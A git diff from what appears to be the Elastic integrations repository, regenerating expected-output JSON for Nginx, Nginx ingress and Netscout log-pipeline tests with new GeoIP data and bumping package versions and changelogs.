"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 pfsp: Alert script msequ ran at 2019-11-15 17:19:22 uat, leader lupta", "event": { - "ingested": "2021-06-09T12:10:11.781163100Z" + "ingested": "2021-12-14T14:48:29.264388443Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 tlabori: Protection Mode: Changed protection mode to active for protection grouplaudan,URL:https://www5.example.com/atcupida/tessequa.htm?dolores=equamnih#taliqui", "event": { - "ingested": "2021-06-09T12:10:11.781168700Z" + "ingested": "2021-12-14T14:48:29.264388815Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 14 07:24:31 destlabo: Change Log: 
Username:rcitat, Subsystem:dolorema, Setting Type:emagn, Message:radipis", "event": { - "ingested": "2021-06-09T12:10:11.781172800Z" + "ingested": "2021-12-14T14:48:29.264389186Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event"
diff --git a/packages/netscout/manifest.yml b/packages/netscout/manifest.yml
index 667ab6f9f3b..6467fe9cdfb 100644
--- a/packages/netscout/manifest.yml
+++ b/packages/netscout/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: netscout
 title: Arbor Peakflow SP Logs
-version: 0.6.0
+version: 0.6.1
 description: Collect and parse logs from Netscout Arbor Peakflow SP with Elastic Agent.
 categories: ["security"]
 release: experimental
diff --git a/packages/nginx/changelog.yml b/packages/nginx/changelog.yml
index 05b88bf7e0c..44ec8316cf9 100644
--- a/packages/nginx/changelog.yml
+++ b/packages/nginx/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.3"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "1.2.2"
 changes:
 - description: Change test public IPs to the supported subset
diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json
index 778ef7889f7..6013a669fdc 100644
--- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json
+++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json
@@ -9,6 +9,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -42,7 +54,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653051900Z", + "ingested": "2021-12-14T14:48:32.282353575Z", "original": "67.43.156.13 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -77,6 +89,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -112,7 +136,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653067Z", + "ingested": "2021-12-14T14:48:32.282356218Z", "original": "67.43.156.13 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -147,6 +171,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -180,7 +216,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653072600Z", + "ingested": "2021-12-14T14:48:32.282356644Z", "original": "67.43.156.13 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -215,6 +251,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -248,7 +296,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653079800Z", + "ingested": "2021-12-14T14:48:32.282357030Z", "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -283,6 +331,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -318,7 +378,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653088800Z", + "ingested": "2021-12-14T14:48:32.282357376Z", "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -353,6 +413,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -386,7 +458,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653098400Z", + "ingested": "2021-12-14T14:48:32.282357746Z", "original": "67.43.156.13 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -421,6 +493,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -454,7 +538,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653105800Z", + "ingested": "2021-12-14T14:48:32.282358112Z", "original": "67.43.156.13 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -489,6 +573,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -522,7 +618,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653111900Z", + "ingested": "2021-12-14T14:48:32.282358462Z", "original": "67.43.156.13 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -590,7 +686,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653118Z", + "ingested": "2021-12-14T14:48:32.282358812Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -658,7 +754,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653124800Z", + "ingested": "2021-12-14T14:48:32.282359158Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -726,7 +822,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653133100Z", + "ingested": "2021-12-14T14:48:32.282359505Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -794,7 +890,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653141500Z", + "ingested": "2021-12-14T14:48:32.282360050Z", "original": "127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /taga HTTP/1.1\" 404 169 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:10:39 -0700] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:15:39 -0700] \"GET /%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B0%D1%8F%20%D1%88%D0%BA%D0%BE%D0%BB%D0%B0%20-%20InternetUrok%201%D0%BA%D0%BB%D0%B0%D1%81%D1%81/ HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json index 6c162949a28..d0b3f9d76fa 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json @@ -44,7 +44,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.512992900Z", + "ingested": "2021-12-14T14:48:34.382243946Z", "original": "10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -112,7 +112,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.513002400Z", + "ingested": "2021-12-14T14:48:34.382246417Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -149,6 +149,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -182,7 +194,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.513008900Z", + "ingested": "2021-12-14T14:48:34.382246878Z", "original": "10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -217,6 +229,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -250,7 +274,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.513013400Z", + "ingested": "2021-12-14T14:48:34.382247234Z", "original": "67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"\n2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -306,7 +330,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:41:42.513018600Z", + "ingested": "2021-12-14T14:48:34.382247609Z", "original": "127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nunix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"\nlocalhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nlocalhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\n", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json index 208427cae38..f829c774f06 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json 
@@ -48,7 +48,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:43.172715Z", + "ingested": "2021-12-14T14:48:35.072680631Z", "original": "example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com 10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com:80 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\nexample.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -90,18 +90,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" 
@@ -138,7 +132,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:43.172728700Z", + "ingested": "2021-12-14T14:48:35.072682974Z", "original": "67.43.156.15 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -194,7 +188,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:41:43.172732700Z", + "ingested": "2021-12-14T14:48:35.072683446Z", "original": "67.43.156.15:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nexample.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -254,7 +248,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:43.172738700Z", + "ingested": "2021-12-14T14:48:35.072683803Z", "original": "67.43.156.15 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com localhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index 76feff53fe3..ad761ec0957 100644 --- a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json 
@@ -20,7 +20,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902411600Z", + "ingested": "2021-12-14T14:48:35.787382431Z", "original": "2016/10/25 14:49:34 [error] 54053#0: *1 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/favicon.ico\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /favicon.ico HTTP/1.1\", host: \"localhost:8080\", referrer: \"http://localhost:8080/\"", "category": [ "web" @@ -56,7 +56,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902415500Z", + "ingested": "2021-12-14T14:48:35.787384966Z", "original": "2016/10/25 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /adsasd HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" @@ -92,7 +92,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902420Z", + "ingested": "2021-12-14T14:48:35.787385442Z", "original": "2019/10/30 23:26:34 [error] 205860#205860: *180289 FastCGI sent in stderr: \"PHP message: PHP Warning: Declaration of FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) should be compatible with FEE_Field_Post::wrap($content, $post_id = 0) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Tags::wrap($content, $before, $sep, $after) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Category::wrap($content, $sep, $parents) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0", "category": [ "web" 
@@ -128,7 +128,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902426Z", + "ingested": "2021-12-14T14:48:35.787385877Z", "original": "2019/11/05 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /pysio HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" diff --git a/packages/nginx/manifest.yml b/packages/nginx/manifest.yml index f40978a8339..654d7e24c39 100644 --- a/packages/nginx/manifest.yml +++ b/packages/nginx/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx title: Nginx -version: 1.2.2 +version: 1.2.3 license: basic description: Collect logs and metrics from Nginx HTTP servers with Elastic Agent. type: integration diff --git a/packages/nginx_ingress_controller/changelog.yml b/packages/nginx_ingress_controller/changelog.yml index a84f3d42a83..7b4d336e08f 100644 --- a/packages/nginx_ingress_controller/changelog.yml +++ b/packages/nginx_ingress_controller/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json index 70287af6ce0..dd99a34c442 100644 --- a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json 
@@ -26,16 +26,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:48:51.000Z", "ecs": { "version": "1.12.0" @@ -57,8 +47,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109908100Z", + "ingested": "2021-12-14T14:48:38.075886418Z", "original": "192.168.64.1 - - [07/Feb/2020:11:48:51 +0000] \"POST /products HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 89 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 529a007902362a5f51385a5fa7049884", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -77,7 +71,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -105,16 +105,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:49:15.000Z", "ecs": { "version": "1.12.0" @@ -136,8 +126,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109949200Z", + "ingested": "2021-12-14T14:48:38.075889380Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:15 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 91 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 68fa971ce4dfce685fdc01c877bfa645", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -156,7 +150,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { 
@@ -184,16 +184,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:49:30.000Z", "ecs": { "version": "1.12.0" @@ -215,8 +205,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109962300Z", + "ingested": "2021-12-14T14:48:38.075889832Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:30 +0000] \"DELETE /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 94 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 0be411044cb1cb67580e115413b2da60", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -235,7 +229,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -263,16 +263,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:49:43.000Z", "ecs": { "version": "1.12.0" @@ -294,8 +284,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109967300Z", + "ingested": "2021-12-14T14:48:38.075890224Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:43 +0000] \"PATCH /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 93 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 f479ab1d9cc8afcbac9e9f958ff8babc", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -314,7 +308,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { 
@@ -361,7 +361,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-12-09T13:41:46.109978Z", + "ingested": "2021-12-14T14:48:38.075890621Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:50 +0000] \"PATCHp /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - 4c7d2079340e68353c7d0dfff00b904b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -425,7 +425,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-12-09T13:41:46.109988500Z", + "ingested": "2021-12-14T14:48:38.075891001Z", "original": "192.168.64.1 - - [07/Feb/2020:11:50:09 +0000] \"geti /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - efb0c5aa8be6cdeb4a7e7bd090e3d893", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -470,16 +470,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:55:05.000Z", "ecs": { "version": "1.12.0" @@ -501,8 +491,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109993100Z", + "ingested": "2021-12-14T14:48:38.075891400Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:05 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Wget/1.20.3 (darwin18.6.0)\" 157 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 457b71c3e1ee1887bb809effd301a0ec", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -521,7 +515,13 @@ "name": "Other" }, "version": "1.20.3" - } + }, + "url": { + "original": "/products/42" 